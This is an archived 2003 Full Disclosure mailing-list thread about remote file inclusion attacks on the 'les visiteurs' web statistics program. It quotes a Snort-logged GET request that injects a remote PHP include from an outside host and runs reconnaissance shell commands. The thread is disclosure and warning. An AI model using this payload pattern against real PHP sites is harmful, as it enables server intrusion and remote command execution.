|
Full Disclosure
mailing list archives
Re: file inclusion (les visiteurs)
From: gazpa <gazpa () euskalnet net>
Date: Tue, 02 Dec 2003 01:09:51 +0100
Hi Lorenzo,
First there isn't *their server*. It's other stuff server
(c2r.canalforbid.org).
Second, they use this server to serve an include file (hax.gif), a php
include to *inject* in the buggy 'les visiteurs' (web statistics
program) remotely and execute shell commands.
And I don't thing they are kiddies, if they wrote 'hax.gif', like it seems.
Don't blame people who is only intending to advise people about a bug
that is being exploited.
Lorenzo Hernandez Garcia-Hierro wrote:
Hi Daniel ,
They are kiddies... :(
I was looking the files and there are only high-risk-rated exploits
downloaded from packet storm , ptrace , etc .
And they are running remote php shells in their server.... xD
See you in the IRC tonight ?
"Evert Daman" <evert () digipix org> wrote:
last night snort detected this request:
GET /counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.
org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls
because i patched 'les visiteurs' as described by 'matthieu peschaud'
on bugtraq on the 26 of october nothing happend, but it looks like someone is trying to exploit this bug.
just want to mention it to this wonderfull list :)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
 By Date 
By Thread
Current thread:
|
Intro
